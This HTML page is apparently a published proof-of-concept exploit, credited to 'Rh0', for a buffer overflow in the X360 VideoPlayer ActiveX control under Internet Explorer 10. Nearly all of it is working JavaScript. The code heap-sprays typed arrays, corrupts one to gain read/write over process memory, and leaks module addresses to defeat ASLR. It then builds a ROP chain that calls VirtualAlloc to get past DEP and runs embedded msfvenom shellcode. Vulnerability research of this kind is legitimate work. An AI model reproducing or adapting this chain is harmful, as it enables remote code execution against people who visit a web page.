<!DOCTYPE HTML>

<!--


###############################################################################
*
* Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass
* Author: Rh0
* Date: Jan 30 2015
* Affected Software: X360 VideoPlayer ActiveX Control 2.6 (VideoPlayer.ocx)
* Vulnerability: Buffer Overflow in Data Section
* Tested on: Internet Explorer 10 32-bit (Windows 7 64-bit in VirtualBox)
* Software Links:
  http://www.x360soft.com/demo/videoplayersetup.exe
  http://download.cnet.com/X360-Video-Player-ActiveX-Control/3000-2170_4-10581185.html

* Detailed writeup: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/
*
###############################################################################


* Information about VideoPlayer.ocx *
###################################

md5sum: f9f2d32ae0e4d7b5c19692d0753451fb

Class VideoPlayer
GUID: {4B3476C6-185A-4D19-BB09-718B565FA67B}
Number of Interfaces: 1
Default Interface: _DVideoPlayer
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False

* NOTES *
#########

*) When passing an overlong string to the ActiveX object's "SetText" method, a
buffer overflow in the data section occurs. It allows overwriting a subsequent
pointer that can be used in a controlled memcpy when dispatching the object's
"SetFontName" method. With this arbitrary write, array structures can be
manipulated to gain access to complete process memory. Equipped with this
capability, necessary information can be leaked and manipulated to execute
arbitrary code remotely.
*) Comment in the alert messages to see some leaks ;)
*) This is PoC Code: If it does not work for you, clear IE's history and try
again. Tested against mshtml.dll and jscript9.dll version 10.0.9200.17183


*) Inspired by:
"http://blog.exodusintel.com/2013/12/09/a-browser-is-only-as-strong-as-its-weakest-byte-part-2/"
"http://ifsec.blogspot.de/2013/11/exploiting-internet-explorer-11-64-bit.html"
"https://cansecwest.com/slides/2014/The Art of Leaks - read version - Yoyo.pdf"
"https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf"
"https://github.com/exp-sky/HitCon-2014-IE-11-0day-Windows-8.1-Exploit/blob/master/IE 11 0day & Windows 8.1 Exploit.pdf"

-->

<html>
<body>
<button onclick=run()>runme</button>
<script>
function run(){
    /* VideoPlayer.ocx image has the rebase flag set =>
       It's mapped to another base per process run */
    /* create its vulnerable ActiveX object (as HTMLObjectElement) */
    var obj = document.createElement("object");
    obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");

    /* amount of arrays to create on the heap */
    nrArrays = 0x1000

    /* size of data in one array block: 0xefe0 bytes =>
       subract array header (0x20) and space for typed array headers (0x1000)
       from 0x10000 */
    arrSize =  (0x10000-0x20-0x1000)/4

    /* heap array container will hold our heap sprayed data */
    arr = new Array(nrArrays)

    /* use one buffer for all typed arrays */
    intArrBuf = new ArrayBuffer(4)
    
    /* spray the heap with array data blocks and subsequent typed array headers
       of type Uint32Array */
    k = 0
    while(k < nrArrays){
        /* create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
           aligned at 0xXXXX0020) */
        arr[k] = new Array(arrSize);
        /* fill remaining page (0x1000) after array data with headers of
           "jscript9!Js::TypedArray<unsigned int>"  (0x55 * 0x30 = 0xff0) as a
           typed array header has the size of 0x30. 0x10 bytes are left empty */
        for(var i= 0; i<0x55; i++){
            /* headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,.. */
            arr[k][i] = new Uint32Array(intArrBuf, 0, 1);
        }
        /* tag the array's last element */
        arr[k][arrSize - 1] = 0x12121212
        k += 1;
    }

    /* perform controlled memwrite to 0x1111f010: typed array header is at
       0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
       0x00000001 0x00000004 0x00000040 0x1111f030 0x00
       The first 3 dwords are sideeffects due to the code we abuse for the
       controlled memcpy */
    addr = 0x1111f010  // WHERE TO WRITE
    /* prepare buffer with address we want to write to */
    ptrBuf = ""
    /* fill buffer: length = relative pointer address - buffer start + pointer
       offset */
    while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)){ptrBuf += "A"}
    ptrBuf += dword2str(addr)

    /* trigger: overflow buffer and overwrite the pointer value after buffer */
    obj.SetText(ptrBuf,0,0)
    //alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")

    /* use overwritten pointer after buffer with method "SetFontName" to conduct
       memory write.  We overwrite a typed array's header length to 0x40 and let
       its buffer point to the next typed array header at 0x1111f030 (see above)
       */
    obj.SetFontName(dword2str(addr+0x20)) // WHAT TO WRITE

    /* find the corrupted Uint32Array (typed array) */
    k = 0
    arrCorrupt = 0
    while(k < 0x1000-1){
        for(var i = 0; i < 0x55-1; i++){
            if(arr[k][i][0] != 0){
                // address of jscript9!Js::TypedArray<unsigned int>::`vftable'
                //alert("0x" + arr[k][i][0].toString(16))
                arrCorrupt = 1
                break
            }
        }
        if (arrCorrupt == 1) break
        k++
    }

    if (!arrCorrupt){
        alert("cannot find corrupted Uint32Array")
        return -1
    }

    /* modify subsequent Uint32Array to be able to RW all process memory */
    arr[k][i][6] = 0x7fffffff // next Uint32Array length
    arr[k][i][7] = 0 // set buffer of next Uint32Array to start of process mem

    /* our memory READWRITE interface :) */
    mem = arr[k][i+1]
    //alert(mem.length.toString(16))
    if (mem.length != 0x7fffffff){
        alert("Cannot change Uint32Array length")
        return -2
    }
    /* now we could even repair the change we did with memcpy ... */
    
    /* leak several pointers and calculate VideoPlayer.ocx base */
    arr[k+1][0] = obj // set HTMLObjectElement as first element
    //alert(mem[0x11120020/4].toString(16))
    arrayElemPtr = mem[(addr + 0x1010)/4] // leak array elem. @ 0x11120020 (obj)
    objPtr = mem[arrayElemPtr/4 + 6] // deref array elem. + 0x18
    heapPtrVideoplayer = mem[objPtr/4 + 25] // deref HTMLObjectElement + 0x64
    /* deref heap pointer containing VideoPlayer.ocx pointer */
    videoplayerPtr = mem[heapPtrVideoplayer/4] 
    base = videoplayerPtr - 0x6b3b0 // calculate base

    /* check if we have the image of VideoPlayer.ocx
       check for MZ9000 header and "Vide" string at offset 0x6a000 */
    if (mem[base/4] != 0x905a4d ||
        mem[(base+0x6a000)/4] != 0x65646956){
        alert("Cannot find VideoPlayer.ocx base or its version is wrong")
        return -3
    }
    //alert(base.toString(16))

    /* get VirtualAlloc from imports of VideoPlayer.ocx */
    virtualAlloc = mem[(base + 0x69174)/4]
    /* memcpy is available inside VideoPlayer.ocx */
    memcpy = base + 0x15070
    //alert("0x" + virtualAlloc.toString(16) + " " + 0x" + memcpy.toString(16))
    
    /* create shellcode (./msfvenom -p windows/exec cmd=calc) */
    sc = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"+
    "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"+
    "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"+
    "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"+
    "\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"+
    "\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"+
    "\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"+
    "\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"+
    "\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"+
    "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
    "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"+
    "\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"+
    "\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"+
    "\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"+
    "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"+
    "\x00"

    scBuf = new Uint8Array(sc.length)
    for (n=0; n<sc.length; n++){
        scBuf[n] = sc.charCodeAt(n)
    }

    /* leak shellcode address */
    arr[k+1][0] = scBuf
    /* therefore, leak array element at 0x11120020 (typed array header of
       Uint8Array containing shellcode) ... */
    elemPtr = mem[(addr + 0x1010)/4] 
    /* ...and deref array element + 0x1c (=> leak shellcode's buffer address) */
    scAddr = mem[(elemPtr/4) + 7] 
    //alert(scAddr.toString(16))

    /* create and leak rop buffer */
    rop = new Uint32Array(0x1000)
    arr[k+1][0] = rop
    /* leak array element at 0x11120020 (typed array header) */
    elemPtr = mem[(addr + 0x1010)/4] 
    /* deref array element + 0x1c (leak rop's buffer address) */
    pAddr = mem[(elemPtr/4) + 7]  // payload address

    /* ROP chain (rets in comments are omitted) */
    /* we perform:
       (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
       memcpy(EAX, shellcode, shellcodeLen)
       (void(*)())EAX() */
    offs = 0x30/4           // offset to chain after CALL [EAX+0x30]
    rop[0] = base + 0x1ff6           // ADD ESP, 0x30;
    rop[offs + 0x0] = base + 0x1ea1e // XCHG EAX, ESP; <-- first gadget called 
    rop[offs + 0x1] = virtualAlloc   // allocate RWX mem (address avail. in EAX)
    rop[offs + 0x2] = base + 0x10e9  // POP ECX; => pop the value at offs + 0x7
    rop[offs + 0x3] = 0              // lpAddress
    rop[offs + 0x4] = 0x1000         // dwSize (0x1000)
    rop[offs + 0x5] = 0x1000         // flAllocationType (MEM_COMMIT)
    rop[offs + 0x6] = 0x40           // flProtect (PAGE_EXECUTE_READWRITE)
    rop[offs + 0x7] = pAddr + (offs+0xe)*4  // points to memcpy's dst param (*2)
    rop[offs + 0x8] = base + 0x1c743 // MOV [ECX], EAX; => set dst to RWX mem
    rop[offs + 0x9] = base + 0x10e9  // POP ECX;
    rop[offs + 0xa] = pAddr + (offs+0xd)*4  // points to (*1) in chain
    rop[offs + 0xb] = base + 0x1c743 // MOV [ECX], EAX; => set return to RWX mem
    rop[offs + 0xc] = memcpy
    rop[offs + 0xd] = 0xffffffff  // (*1): ret addr to RWX mem filled at runtime
    rop[offs + 0xe] = 0xffffffff  // (*2): dst for memcpy filled at runtime
    rop[offs + 0xf] = scAddr   // shellcode src addr to copy to RWX mem (param2)
    rop[offs + 0x10] = sc.length     // length  of shellcode (param3)

    /* manipulate object data to gain EIP control with "Play" method */
    videopObj = mem[objPtr/4 + 26]
    mem[(videopObj-0x10)/4] = pAddr // pAddr will be used in EAX in below call

    /* eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
    obj.Play() 

}

/* dword to little endian string */
function dword2str(dword){
    str = ""
    for (n=0; n<4; n++){
        str += String.fromCharCode((dword >> 8*n) & 0xff)
    }
    return str

}
//setTimeout(run(), 3000);
</script>
</body>
</html>
